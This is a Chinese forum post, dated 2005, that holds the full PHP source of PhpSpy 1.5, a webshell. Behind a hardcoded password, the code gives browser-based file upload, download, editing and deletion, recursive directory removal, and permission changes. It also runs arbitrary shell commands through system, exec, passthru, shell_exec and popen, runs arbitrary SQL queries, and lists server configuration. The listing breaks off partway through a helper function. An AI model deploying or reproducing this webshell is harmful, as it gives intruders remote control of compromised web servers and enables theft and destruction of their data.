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发表于 2005 年 6 月 15 日 22:25:07 | 显示全部楼层 |阅读模式


您需要 登录 才可以下载或查看,没有账号?注册

  1. <?php
  2. /*
  3. +--------------------------------------------------------------------------+
  4. | PhpSpy Version:1.5                                                       |
  5. | Codz by Angel                                                            |
  6. | (c) 2004 Security Angel Team                                             |
  7. | [url]http://www.4ngel.net[/url]                                                     |
  8. | ======================================================================== |
  9. | Team:  [url]http://www.4ngel.net[/url]                                              |
  10. |        [url]http://www.bugkidz.org[/url]                                            |
  11. | Email: [email]4ngel@21cn.com[/email]                                                    |
  12. | Date:  July 22st(My mother's birthday), 2004                             |
  13. +--------------------------------------------------------------------------+
  14. */
  15. error_reporting(7);
  16. ob_start();
  17. $mtime = explode(' ', microtime());
  18. $starttime = $mtime[1] + $mtime[0];
  19. /*===================== 程序配置 =====================*/
  20. // 是否需要密码验证,1为需要验证,其他数字为直接进入.下面选项则无效
  21. $admin['check']="1";
  22. // 验证方式,1为采用 Session 验证,其他数字则采用 Cookie验证
  23. // 默认采用 Session 验证,如果不能正常登陆,建议改为 Cookie验证
  24. $admin['checkmode']="1";
  25. // 如果需要密码验证,请修改登陆密码
  26. $admin['pass']="angel";
  27. /*===================== 配置结束 =====================*/
  28. // 允许程序在 register_globals = off 的环境下工作
  29. if ( function_exists('ini_get') ) {
  30.    $onoff = ini_get('register_globals');
  31. } else {
  32.    $onoff = get_cfg_var('register_globals');
  33. }
  34. if ($onoff != 1) {
  35.    @extract($_POST, EXTR_SKIP);
  36.    @extract($_GET, EXTR_SKIP);
  37. }
  38. /*===================== 身份验证 =====================*/
  39. if($admin['check']=="1") {
  40.    if($admin['checkmode']=="1") {
  41.    /*------- session 验证 -------*/
  42.        session_start();
  43.        if ($_GET['action'] == "logout") {
  44.            session_destroy();
  45.            echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$_SERVER['PHP_SELF']."\">";
  46.            echo "<span style=\"font-size: 12px; font-family: Verdana\">注销成功......<p><a href=\"".$_SERVER['PHP_SELF']."\">三秒后自动退出或单击这里退出程序界面>>></a></span>";
  47.            exit;
  48.        }
  49.        if ($_POST['action'] == "login") {
  50.            $adminpass=trim($_POST['adminpass']);
  51.            if ($adminpass==$admin['pass']) {
  52.                $_SESSION['adminpass'] = $admin['pass'];
  53.                echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$_SERVER['PHP_SELF']."\">";
  54.                echo "<span style=\"font-size: 12px; font-family: Verdana\">登陆成功......<p><a href=\"".$_SERVER['PHP_SELF']."\">三秒后自动跳转或单击这里进入程序界面>>></a></span>";
  55.                exit;
  56.            }
  57.        }
  58.        if (session_is_registered('adminpass')) {
  59.            if ($_SESSION['adminpass']!=$admin['pass']) {
  60.                loginpage();
  61.            }
  62.        } else {
  63.            loginpage();
  64.        }
  65.    } else {
  66.    /*------- cookie 验证 -------*/
  67.        if ($_GET['action'] == "logout") {
  68.            setcookie ("adminpass", "");
  69.            echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$_SERVER['PHP_SELF']."\">";
  70.            echo "<span style=\"font-size: 12px; font-family: Verdana\">注销成功......<p><a href=\"".$_SERVER['PHP_SELF']."\">三秒后自动退出或单击这里退出程序界面>>></a></span>";
  71.            exit;
  72.        }
  73.        if ($_POST['action'] == "login") {
  74.            $adminpass=trim($_POST['adminpass']);
  75.            if ($adminpass==$admin['pass']) {
  76.                setcookie ("adminpass",$admin['pass'],time()+(1*24*3600));
  77.                echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$_SERVER['PHP_SELF']."\">";
  78.                echo "<span style=\"font-size: 12px; font-family: Verdana\">登陆成功......<p><a href=\"".$_SERVER['PHP_SELF']."\">三秒后自动跳转或单击这里进入程序界面>>></a></span>";
  79.                exit;
  80.            }
  81.        }
  82.        if (isset($_COOKIE['adminpass'])) {
  83.            if ($_COOKIE['adminpass']!=$admin['pass']) {
  84.                loginpage();
  85.            }
  86.        } else {
  87.            loginpage();
  88.        }
  89.    }
  90. }//end check
  91. /*===================== 验证结束 =====================*/
  92. // 判断 magic_quotes_gpc 状态
  93. if (get_magic_quotes_gpc()) {
  94.    $_GET = stripslashes_array($_GET);
  95.    $_POST = stripslashes_array($_POST);
  96. }
  97. // 下载文件
  98. if (!empty($downfile)) {
  99.    if (!@file_exists($downfile)) {
  100.        echo "<script>alert('你要下的文件不存在!')</script>";
  101.    } else {
  102.        $filename = basename($downfile);
  103.        $filename_info = explode('.', $filename);
  104.        $fileext = $filename_info[count($filename_info)-1];
  105.        header('Content-type: application/x-'.$fileext);
  106.        header('Content-Disposition: attachment; filename='.$filename);
  107.        header('Content-Description: PHP3 Generated Data');
  108.        @readfile($downfile);
  109.        exit;
  110.    }
  111. }
  112. // 程序目录(文件系统)
  113. $pathname=str_replace('\\','/',dirname(__FILE__));
  114. // 获取当前路径
  115. if (!isset($dir) or empty($dir)) {
  116.    $dir = ".";
  117.    $nowpath = getPath($pathname, $dir);
  118. } else {
  119.    $dir=$_GET['dir'];
  120.    $nowpath = getPath($pathname, $dir);
  121. }
  122. // 判断读写情况
  123. if (dir_writeable($nowpath)) {
  124.    $dir_writeable = "可写";
  125. } else {
  126.    $dir_writeable = "不可写";
  127. }
  128. $dis_func = get_cfg_var("disable_functions");
  129. $phpinfo=(!eregi("phpinfo",$dis_func)) ? " | <a href=\"?action=phpinfo\">PHPINFO</a>" : "";
  130. $shellmode=(!get_cfg_var("safe_mode")) ? " | <a href=\"?action=shell\">WebShell模式</a>" : "";
  131. ?>
  132. <html>
  133. <head>
  134. <meta http-equiv="Content-Type" content="text/html; charset=gb2312">
  135. <title>PhpSpy Ver 1.5</title>
  136. <style type="text/css">
  137. .maintable {
  138.    background-color: "#FFFFFF";
  139.    border: "1px solid #115173";
  140. }
  141. body,td {
  142.    font-family: "sans-serif";
  143.    font-size: "12px";
  144.    line-height: "150%";
  145. }
  146. .INPUT {
  147.    FONT-SIZE: "12px";
  148.    COLOR: "#000000";
  150.    height: "18px";
  151.    border: "1px solid #666666";
  152. }
  153. a:link,
  154. a:visited,
  155. a:active{
  156.    color: "#000000";
  157.    text-decoration: underline;
  158. }
  159. a:hover{
  160.    color: "#465584";
  161.    text-decoration: none;
  162. }
  163. .firstalt    {BACKGROUND-COLOR: "#EFEFEF"}
  164. .secondalt    {BACKGROUND-COLOR: "#F5F5F5"}
  165. </style>
  166. </head>
  167. <body style="table-layout:fixed; word-break:break-all">
  168. <center>
  169. <p><strong><a href="?action=logout">注销会话</a> | <a href="?action=dir">返回根目录</a> | <a href="?action=phpenv">PHP环境变量</a><?=$phpinfo?><?=$shellmode?> | <a href="?action=sql">SQL查询</a> | <a href="[url]http://www.4ngel.net[/url]" target="_blank" title="下载此程序">Version 1.5</a></strong></p>
  170. <?php
  171. if ($_GET['action'] == "phpinfo") {
  172.    $dis_func = get_cfg_var("disable_functions");
  173.    echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() 函数已被禁用,请查看<PHP环境变量>";
  174.    exit;
  175. }
  176. ?>
  177. <table width="760" border="0" cellpadding="0">
  178. <form action="" method="GET">
  179.   <tr>     
  180.      <td><p>程序路径:<?=$pathname?><br>当前目录(<?=$dir_writeable?>,<?=substr(base_convert(@fileperms($nowpath),10,8),-4);?>):<?=$nowpath?>
  181.        <br>跳转目录:
  182.        <input name="dir" type="text" class="INPUT">
  183.        <input type="submit" class="INPUT" value="确定"> 〖支持绝对路径和相对路径〗
  184.    </p></td>
  185.   </tr>
  186. </form>
  187. <form action="?dir=<?=urlencode($dir)?>" method="POST" enctype="multipart/form-data">
  188.   <tr>
  189.    <td colspan="2">上传文件到当前目录:
  190.      <input name="uploadmyfile" type="file" class="INPUT">    <input type="submit" class="INPUT" value="确定">
  191.      <input name="action" type="hidden" value="uploadfile"><input type="hidden" name="uploaddir" value="<?=$dir?>"></td>
  192.   </tr>
  193.   </form>
  194.   <form action="?action=editfile&dir=<?=urlencode($dir)?>" method="POST">
  195.   <tr>
  196.    <td colspan="2">新建文件在当前目录:
  197.        <input name="newfile" type="text" class="INPUT" value="">
  198.        <input type="submit" class="INPUT" value="确定">
  199.        <input name="action" type="hidden" value="createfile"></td>
  200.   </tr>
  201.   </form>
  202.   <form action="" method="POST">
  203.   <tr>
  204.    <td colspan="2">新建目录在当前目录:
  205.        <input name="newdirectory" type="text" class="INPUT" value="">
  206.        <input type="submit" class="INPUT" value="确定">
  207.        <input name="action" type="hidden" value="createdirectory"></td>
  208.   </tr>
  209.   </form>
  210. </table>
  211. <hr width="760" noshade>
  212. <?php
  213. /*===================== 执行操作 开始 =====================*/
  214. echo "<p><b>\n";
  215. // 删除文件
  216. if(@$delfile!="") {
  217.    if(file_exists($delfile)) {
  218.        @unlink($delfile);
  219.        echo "".$delfile." 删除成功!";
  220.    } else {
  221.        echo "文件已不存在,删除失败!";
  222.    }
  223. }
  224. // 删除目录
  225. elseif($_POST['action'] == "rmdir") {
  226.    if($deldir!="") {
  227.        $deldirs="$dir/$deldir";
  228.        if(!file_exists("$deldirs")) {
  229.            echo "目录已不存在!";
  230.        } else {
  231.            deltree($deldirs);
  232.        }
  233.    } else {
  234.        echo "删除失败!";
  235.    }
  236. }
  237. // 创建目录
  238. elseif($_POST['action'] == "createdirectory") {
  239.    if(!empty($newdirectory)) {
  240.        $mkdirs="$dir/$newdirectory";
  241.        if(file_exists("$mkdirs")) {
  242.            echo "该目录已存在!";
  243.        } else {
  244.            echo $msg=@mkdir("$mkdirs",0777) ? "创建目录成功!" : "创建失败!";
  245.            @chmod("$mkdirs",0777);
  246.        }
  247.    }
  248. }
  249. // 上传文件
  250. elseif($_POST['action'] == "uploadfile") {
  251.    echo $msg=@copy($_FILES['uploadmyfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadmyfile']['name']."") ? "上传成功!" : "上传失败!";
  252. }
  253. // 编辑文件
  254. elseif($_POST['action'] == "doeditfile") {
  255.    $filename="$dir/$editfilename";
  256.    @$fp=fopen("$filename","w");
  257.    echo $msg=@fwrite($fp,$_POST['filecontent']) ? "写入文件成功!" : "写入失败!";
  258.    @fclose($fp);
  259. }
  260. // 编辑文件属性
  261. elseif($_POST['action'] == "editfileperm") {
  262.    $fileperm=base_convert($_POST['fileperm'],8,10);
  263.    echo $msg=@chmod($dir."/".$file,$fileperm) ? "属性修改成功!" : "修改失败!";
  264.    echo " [".$file."] 修改后的属性为:".substr(base_convert(@fileperms($dir."/".$file),10,8),-4)."";
  265. }
  266. // 连接MYSQL
  267. elseif($connect) {
  268.    if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) {
  269.        echo "数据库连接成功!";
  270.    } else {
  271.        echo mysql_error();
  272.    }
  273. }
  274. // 执行SQL语句
  275. elseif($doquery) {
  276.    @mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败");
  277.    @mysql_select_db($dbname) or die("选择数据库失败");
  278.    $result = @mysql_query($_POST['sql_query']);
  279.    if ($result) {
  280.        echo "SQL语句成功执行";
  281.    }else{
  282.        echo "出错: ".mysql_error();
  283.    }
  284.    mysql_close();
  285. }
  286. // 查看PHP配置参数状况
  287. elseif($_POST['action'] == "viewphpvar") {
  288.    echo "配置参数 ".$_POST['phpvarname']." 检测结果: ".getphpcfg($_POST['phpvarname'])."";
  289. }
  290. else {
  291.    echo "本程序由 Security Angel 安全组织 angel[BST] 独立开发,可在 <a href=\"[url]http://www.4ngel.net[/url]\" target=\"_blank\">[url]http://www.4ngel.net[/url]</a> 下载最新版本.";
  292. }
  293. echo "</b></p>\n";
  294. /*===================== 执行操作 结束 =====================*/
  295. if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) {
  296. ?>
  297. <table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
  298.   <tr bgcolor="#cccccc">
  299.    <td align="center" nowrap width="40%"><b>文件</b></td>
  300.    <td align="center" nowrap width="20%"><b>修改日期</b></td>
  301.    <td align="center" nowrap width="12%"><b>大小</b></td>
  302.    <td align="center" nowrap width="8%"><b>属性</b></td>
  303.    <td align="center" nowrap width="20%"><b>操作</b></td>
  304.   </tr>
  305. <?php
  306. // 目录列表
  307. $dirs=@opendir($dir);
  308. while ($file=@readdir($dirs)) {
  309.    $b="$dir/$file";
  310.    $a=@is_dir($b);
  311.    if($a=="1"){
  312.        if($file!=".."&&$file!=".")    {
  313.            $lastsave=@date("Y-n-d H:i:s",filemtime("$dir/$file"));
  314.            $dirperm=substr(base_convert(fileperms("$dir/$file"),10,8),-4);
  315.            echo "<tr class=".getrowbg().">\n";
  316.            echo "  <td style=\"padding-left: 5px;\">[<a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\"><font color=\"#006699\">$file</font></a>]</td>\n";
  317.            echo "  <td align=\"center\" nowrap valign=\"top\">$lastsave</td>\n";
  318.            echo "  <td align=\"center\" nowrap valign=\"top\"><dir></td>\n";
  319.            echo "  <td align=\"center\" nowrap valign=\"top\"><a href=\"?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$dirperm</a></td>\n";
  320.            echo "  <td align=\"center\" nowrap valign=\"top\"><a href=\"?action=deldir&dir=".urlencode($dir)."&deldir=".urlencode($file)."\">删除</a></td>\n";
  321.            echo "</tr>\n";
  322.        } else {
  323.            if($file=="..") {
  324.                echo "<tr class=".getrowbg().">\n";
  325.                echo "  <td nowrap colspan=\"5\" style=\"padding-left: 5px;\"><a href=\"?dir=".$dir."/".$file."\">返回上级目录</a></td>\n";
  326.                echo "</tr>\n";
  327.            }
  328.        }
  329.        $dir_i++;
  330.    }
  331. }//while
  332. @closedir($dirs);
  333. // 文件列表
  334. $dirs=@opendir($dir);
  335. while ($file=@readdir($dirs)) {
  336.    $b="$dir/$file";
  337.    $a=@is_dir($b);
  338.    if($a=="0"){
  339.        $size=@filesize("$dir/$file");
  340.        $size=$size/1024 ;
  341.        $size= @number_format($size, 3);    
  342.        $lastsave=@date("Y-n-d H:i:s",filectime("$dir/$file"));
  343.        @$fileperm=substr(base_convert(fileperms("$dir/$file"),10,8),-4);
  344.        echo "<tr class=".getrowbg().">\n";
  345.        echo "  <td style=\"padding-left: 5px;\"><a href=\"$dir/$file\" target=\"_blank\">$file</a></td>\n";
  346.        echo "  <td align=\"center\" nowrap valign=\"top\">$lastsave</td>\n";
  347.        echo "  <td align=\"center\" nowrap valign=\"top\">$size KB</td>\n";
  348.        echo "  <td align=\"center\" nowrap valign=\"top\"><a href=\"?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$fileperm</a></td>\n";
  349.        echo "  <td align=\"center\" nowrap valign=\"top\"><a href=\"?downfile=".urlencode($dir)."/".urlencode($file)."\">下载</a> | <a href=\"?action=editfile&dir=".urlencode($dir)."&editfile=".urlencode($file)."\">编辑</a> | <a href=\"?dir=".urlencode($dir)."&delfile=".urlencode($dir)."/".urlencode($file)."\">删除</a></td>\n";
  350.        echo "</tr>\n";
  351.        $file_i++;
  352.    }
  353. }
  354. @closedir($dirs);
  355. echo "<tr class=".getrowbg().">\n";
  356. echo "  <td nowrap colspan=\"5\" align=\"right\">".$dir_i." 个目录<br>".$file_i." 个文件</td>\n";
  357. echo "</tr>\n";
  358. ?>
  359. </table>
  360. <?php
  361. }// end dir
  362. elseif ($_GET['action'] == "editfile") {
  363.    if($newfile=="") {
  364.        $filename="$dir/$editfile";
  365.        $fp=@fopen($filename,"r");
  366.        $contents=@fread($fp, filesize($filename));
  367.        @fclose($fp);
  368.        $contents=htmlspecialchars($contents);
  369.    }else{
  370.        $editfile=$newfile;
  371.        $filename = "$dir/$editfile";
  372.    }
  373. ?>
  374. <table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
  375.   <tr class="firstalt">
  376.    <td align="center">新建/编辑文件 [<a href="?dir=<?=urlencode($dir)?>">返回</a>]</td>
  377.   </tr>
  378.   <form action="?dir=<?=urlencode($dir)?>" method="POST">
  379.   <tr class="secondalt">
  380.    <td align="center">当前文件:<input class="input" type="text" name="editfilename" size="30"
  381. value="<?=$editfile?>"> 输入新文件名则建立新文件</td>
  382.   </tr>  
  383.   <tr class="firstalt">
  384.    <td align="center"><textarea name="filecontent" cols="100" rows="20"><?=$contents?></textarea></td>
  385.   </tr>  
  386.   <tr class="secondalt">
  387.    <td align="center"><input type="submit" value="确定写入" class="input">
  388.      <input name="action" type="hidden" value="doeditfile">
  389.      <input type="reset" value="重置" class="input"></td>
  390.   </tr>
  391.   </form>
  392. </table>
  393. <?php
  394. }//end editfile
  395. elseif ($_GET['action'] == "shell") {
  396.    if (!get_cfg_var("safe_mode")) {
  397. ?>
  398. <table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
  399.   <tr class="firstalt">
  400.    <td align="center">WebShell Mode</td>
  401.   </tr>
  402.   <form action="?action=shell&dir=<?=urlencode($dir)?>" method="POST">
  403.   <tr class="secondalt">
  404.    <td align="center">提示:如果输出结果不完全,建议把输出结果写入文件.这样可以得到全部内容.</td>
  405.   </tr>
  406.   <tr class="firstalt">
  407.    <td align="center">
  408.      选择执行函数:
  409.      <select name="execfunc" class="input">
  410.        <option value="system" <? if ($execfunc=="system") { echo "selected"; } ?>>system</option>
  411.        <option value="passthru" <? if ($execfunc=="passthru") { echo "selected"; } ?>>passthru</option>
  412.        <option value="exec" <? if ($execfunc=="exec") { echo "selected"; } ?>>exec</option>
  413.        <option value="shell_exec" <? if ($execfunc=="shell_exec") { echo "selected"; } ?>>shell_exec</option>
  414.        <option value="popen" <? if ($execfunc=="popen") { echo "selected"; } ?>>popen</option>
  415.      </select> 
  416.      输入命令:
  417.      <input type="text" name="command" size="60" value="<?=$_POST['command']?>" class="input">
  418.      <input type="submit" value="execute" class="input"></td>
  419.   </tr>  
  420.   <tr class="secondalt">
  421.    <td align="center"><textarea name="textarea" cols="100" rows="25" readonly><?php
  422.    if (!empty($_POST['command'])) {
  423.        if ($execfunc=="system") {
  424.            system($_POST['command']);
  425.        } elseif ($execfunc=="passthru") {
  426.            passthru($_POST['command']);
  427.        } elseif ($execfunc=="exec") {
  428.            $result = exec($_POST['command']);
  429.            echo $result;
  430.        } elseif ($execfunc=="shell_exec") {
  431.            $result=shell_exec($_POST['command']);
  432.            echo $result;    
  433.        } elseif ($execfunc=="popen") {
  434.            $pp = popen($_POST['command'], 'r');
  435.            $read = fread($pp, 2096);
  436.            echo $read;
  437.            pclose($pp);
  438.        } else {
  439.            system($_POST['command']);
  440.        }
  441.    }
  442.    ?></textarea></td>
  443.   </tr>  
  444.   </form>
  445. </table>
  446. <?php
  447.    } else {
  448. ?>
  449. <p><b>Safe_Mode 已打开, 无法执行系统命令.</b></p>
  450. <?php
  451.    }
  452. }//end shell
  453. elseif ($_GET['action'] == "deldir") {
  454. ?>
  455. <table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
  456.   <form action="?dir=<?=urlencode($dir)?>" method="POST">
  457.   <tr class="firstalt">
  458.    <td align="center">删除 <input name="deldir" type="text" value="<?=$deldir?>" class="input" readonly> 目录</td>
  459.   </tr>  
  460.   <tr class="secondalt">
  461.    <td align="center">注意:如果该目录非空,此次操作将会删除该目录下的所有文件.您确定吗?</td>
  462.   </tr>  
  463.   <tr class="firstalt">
  464.    <td align="center">     
  465.      <input name="action" type="hidden" value="rmdir">
  466.      <input type="submit" value="delete" class="input">
  467.    </td>
  468.   </tr>  
  469.   </form>
  470. </table>
  471. <?php
  472. }//end deldir
  473. elseif ($_GET['action'] == "fileperm") {
  474. ?>
  475. <table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
  476.   <tr class="firstalt">
  477.    <td align="center">修改文件属性 [<a href="?dir=<?=urlencode($dir)?>">返回</a>]</td>
  478.   </tr>
  479.   <form action="?dir=<?=urlencode($dir)?>" method="POST">
  480.   <tr class="secondalt">
  481.    <td align="center"><input name="file" type="text" value="<?=$file?>" class="input" readonly> 的属性为:
  482.      <input type="text" name="fileperm" size="20" value="<?=substr(base_convert(fileperms($dir."/".$file),10,8),-4)?>" class="input">
  483.      <input name="dir" type="hidden" value="<?=urlencode($dir)?>">
  484.      <input name="action" type="hidden" value="editfileperm">
  485.      <input type="submit" value="modify" class="input"></td>
  486.   </tr>  
  487.   </form>
  488. </table>
  489. <?php
  490. }//end fileperm
  491. elseif ($_GET['action'] == "sql") {
  492.    $servername = isset($servername) ? $servername : '';
  493.    $dbusername = isset($dbusername) ? $dbusername : 'root';
  494.    $dbpassword = isset($dbpassword) ? $dbpassword : '';
  495.    $dbname = isset($dbname) ? $dbname : '';
  496. ?>
  497. <table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
  498.   <tr class="firstalt">
  499.    <td align="center">执行 SQL 语句</td>
  500.   </tr>
  501.   <form action="?action=sql" method="POST">
  502.   <tr class="secondalt">
  503.    <td align="center">Host:
  504.    <input name="servername" type="text" class="INPUT" value="<?=$servername?>">
  505.    User:
  506.    <input name="dbusername" type="text" class="INPUT" size="15" value="<?=$dbusername?>">
  507.    Pass:
  508.    <input name="dbpassword" type="text" class="INPUT" size="15" value="<?=$dbpassword?>">
  509.    DB:
  510.    <input name="dbname" type="text" class="INPUT" size="15" value="<?=$dbname?>">
  511.    <input name="connect" type="submit" class="INPUT" value="连接"></td>
  512.   </tr>
  513.   <tr class="firstalt">
  514.    <td align="center"><textarea name="sql_query" cols="85" rows="10"></textarea></td>
  515.   </tr>
  516.   <tr class="secondalt">
  517.    <td align="center"><input type="submit" name="doquery" value="执行" class="input"></td>
  518.   </tr>  
  519.   </form>
  520. </table>
  521. <?php
  522. }//end sql query
  523. elseif ($_GET['action'] == "phpenv") {
  524.    $upsize=get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "不允许上传";
  525.    $adminmail=(isset($_SERVER["SERVER_ADMIN"])) ? "<a href=\"mailto:".$_SERVER["SERVER_ADMIN"]."\">".$_SERVER["SERVER_ADMIN"]."</a>" : "<a href=\"mailto:".get_cfg_var("sendmail_from")."\">".get_cfg_var("sendmail_from")."</a>";
  526.    $dis_func = get_cfg_var("disable_functions");
  527.    if ($dis_func == "") {
  528.        $dis_func = "No";
  529.    }else {
  530.        $dis_func = str_replace(" ","<br>",$dis_func);
  531.        $dis_func = str_replace(",","<br>",$dis_func);
  532.    }
  534.    $phpinfo=(!eregi("phpinfo",$dis_func)) ? "Yes" : "No";
  535.    $info[0]  = array("服务器时间",date("Y年m月d日 h:i:s",time()));
  536.    $info[1]  = array("服务器域名","<a href=\"[url]http://$_SERVER[/url][SERVER_NAME]\" target=\"_blank\">$_SERVER[SERVER_NAME]</a>");
  537.    $info[2]  = array("服务器IP地址",gethostbyname($_SERVER["SERVER_NAME"]));
  538.    $info[3]  = array("服务器操作系统",PHP_OS);
  539.    $info[5]  = array("服务器操作系统文字编码",$_SERVER["HTTP_ACCEPT_LANGUAGE"]);
  540.    $info[6]  = array("服务器解译引擎",$_SERVER["SERVER_SOFTWARE"]);
  541.    $info[7]  = array("Web服务端口",$_SERVER["SERVER_PORT"]);
  542.    $info[8]  = array("PHP运行方式",strtoupper(php_sapi_name()));
  543.    $info[9]  = array("PHP版本",PHP_VERSION);
  544.    $info[10] = array("运行于安全模式",getphpcfg("safemode"));
  545.    $info[11] = array("服务器管理员",$adminmail);
  546.    $info[12] = array("本文件路径",__FILE__);
  548.    $info[13] = array("允许使用 URL 打开文件 allow_url_fopen",getphpcfg("allow_url_fopen"));
  549.    $info[14] = array("允许动态加载链接库 enable_dl",getphpcfg("enable_dl"));
  550.    $info[15] = array("显示错误信息 display_errors",getphpcfg("display_errors"));
  551.    $info[16] = array("自动定义全局变量 register_globals",getphpcfg("register_globals"));
  552.    $info[17] = array("magic_quotes_gpc",getphpcfg("magic_quotes_gpc"));
  553.    $info[18] = array("程序最多允许使用内存量 memory_limit",getphpcfg("memory_limit"));
  554.    $info[19] = array("POST最大字节数 post_max_size",getphpcfg("post_max_size"));
  555.    $info[20] = array("允许最大上传文件 upload_max_filesize",$upsize);
  556.    $info[21] = array("程序最长运行时间 max_execution_time",getphpcfg("max_execution_time")."秒");
  557.    $info[22] = array("被禁用的函数 disable_functions",$dis_func);
  558.    $info[23] = array("phpinfo()",$phpinfo);
  559.    $info[24] = array("目前还有空余空间diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb');
  560.    $info[25] = array("图形处理 GD Library",getfun("imageline"));
  561.    $info[26] = array("IMAP电子邮件系统",getfun("imap_close"));
  562.    $info[27] = array("MySQL数据库",getfun("mysql_close"));
  563.    $info[28] = array("SyBase数据库",getfun("sybase_close"));
  564.    $info[29] = array("Oracle数据库",getfun("ora_close"));
  565.    $info[30] = array("Oracle 8 数据库",getfun("OCILogOff"));
  566.    $info[31] = array("PREL相容语法 PCRE",getfun("preg_match"));
  567.    $info[32] = array("PDF文档支持",getfun("pdf_close"));
  568.    $info[33] = array("Postgre SQL数据库",getfun("pg_close"));
  569.    $info[34] = array("SNMP网络管理协议",getfun("snmpget"));
  570.    $info[35] = array("压缩文件支持(Zlib)",getfun("gzclose"));
  571.    $info[36] = array("XML解析",getfun("xml_set_object"));
  572.    $info[37] = array("FTP",getfun("ftp_login"));
  573.    $info[38] = array("ODBC数据库连接",getfun("odbc_close"));
  574.    $info[39] = array("Session支持",getfun("session_start"));
  575.    $info[40] = array("Socket支持",getfun("fsockopen"));
  576. ?>
  577. <table width="760" border="0" align="center" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
  578. <form action="?action=phpenv" method="POST">
  579.   <tr class="firstalt">
  580.    <td style="padding-left: 5px;"><b>查看PHP配置参数状况</b></td>
  581.   </tr>
  582.   <tr class="secondalt">
  583.    <td style="padding-left: 5px;">请输入配置参数(如:magic_quotes_gpc):<input name="phpvarname" type="text" class="input" size="40"> <input type="submit" value="查看" class="input"><input name="action" type="hidden" value="viewphpvar"></td>
  584.   </tr>
  585. </form>
  586. <?php
  587.    for($a=0;$a<3;$a++){
  588.        if($a == 0){
  589.            $hp = array("server","服务器特性");
  590.        }elseif($a == 1){
  591.            $hp = array("php","PHP基本特性");
  592.        }elseif($a == 2){
  593.            $hp = array("basic","组件支持状况");
  594.        }
  595. ?>
  596.   <tr class="firstalt">
  597.    <td style="padding-left: 5px;"><b><?=$hp[1]?></b></td>
  598.   </tr>
  599.   <tr class="secondalt">
  600.    <td>
  601.      <table width="100%" border="0" cellpadding="0" cellspacing="0">
  602. <?
  603.        if($a == 0){
  604.            for($i=0;$i<=12;$i++){
  605.                echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
  606.            }
  607.        }elseif($a == 1){
  608.            for($i=13;$i<=24;$i++){
  609.                echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
  610.            }
  611.        }elseif($a == 2){
  612.            for($i=25;$i<=40;$i++){
  613.                echo "<tr><td width=40% style=\"padding-left: 5px;\">".$info[$i][0]."</td><td>".$info[$i][1]."</td></tr>\n";
  614.            }
  615.        }
  616. ?>
  617.      </table>
  618.    </td>
  619.   </tr>
  620. <?
  621.    }//for
  622. echo "</table>";
  623. }//end phpenv
  624. ?>
  625. <hr width="760" noshade>
  626. <table width="760" border="0" cellpadding="0">
  627.   <tr>
  628.    <td>Copyright (C) 2004 Security Angel Team [S4T] All Rights Reserved.</td>
  629.    <td align="right"><?php
  630.    debuginfo();
  631.    ob_end_flush();    
  632.    ?></td>
  633.   </tr>
  634. </table>
  635. </center>
  636. </body>
  637. </html>
  638. <?php
  639. /*======================================================
  640. 函数库
  641. ======================================================*/
  642.    // 登陆入口
  643.    function loginpage() {
  644. ?>
  645.        <style type="text/css">
  646.        input {
  647.            font-family: "Verdana";
  648.            font-size: "11px";
  649.            BACKGROUND-COLOR: "#FFFFFF";
  650.            height: "18px";
  651.            border: "1px solid #666666";
  652.        }
  653.        </style>
  654.        <form method="POST" action="">
  655.        <span style="font-size: 11px; font-family: Verdana">Password: </span><input name="adminpass" type="password" size="20"><input type="hidden" name="action" value="login">
  656.        <input type="submit" value="OK">
  657.        </form>
  658. <?php
  659.        exit;
  660.    }//end loginpage()
  661.    // 页面调试信息
  662.    function debuginfo() {
  663.        global $starttime;
  664.        $mtime = explode(' ', microtime());
  665.        $totaltime = number_format(($mtime[1] + $mtime[0] - $starttime), 6);
  666.        echo "Processed in $totaltime second(s)";
  667.    }
  668.    // 去掉转义字符
  669.    function stripslashes_array(&$array) {
  670.        while(list($key,$var) = each($array)) {
  671.            if ($key != 'argc' && $key != 'argv' && (strtoupper($key) != $key || ''.intval($key) == "$key")) {
  672.                if (is_string($var)) {
  673.                    $array[$key] = stripslashes($var);
  674.                }
  675.                if (is_array($var))  {
  676.                    $array[$key] = stripslashes_array($var);
  677.                }
  678.            }
  679.        }
  680.        return $array;
  681.    }
  682.    // 删除目录
  683.    function deltree($deldir) {
  684.        $mydir=@dir($deldir);    
  685.        while($file=$mydir->read())    {        
  686.            if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) {
  687.                @chmod("$deldir/$file",0777);
  688.                deltree("$deldir/$file");
  689.            }
  690.            if (is_file("$deldir/$file")) {
  691.                @chmod("$deldir/$file",0777);
  692.                @unlink("$deldir/$file");
  693.            }
  694.        }
  695.        $mydir->close();
  696.        @chmod("$deldir",0777);
  697.        echo @rmdir($deldir) ? "<b>目录删除成功!</b>" : "<font color=\"#ff0000\">目录删除失败!</font>";    
  698.    }
  699.    // 判断读写情况
  700.    function dir_writeable($dir) {
  701.        if (!is_dir($dir)) {
  702.            @mkdir($dir, 0777);
  703.        }
  704.        if(is_dir($dir)) {
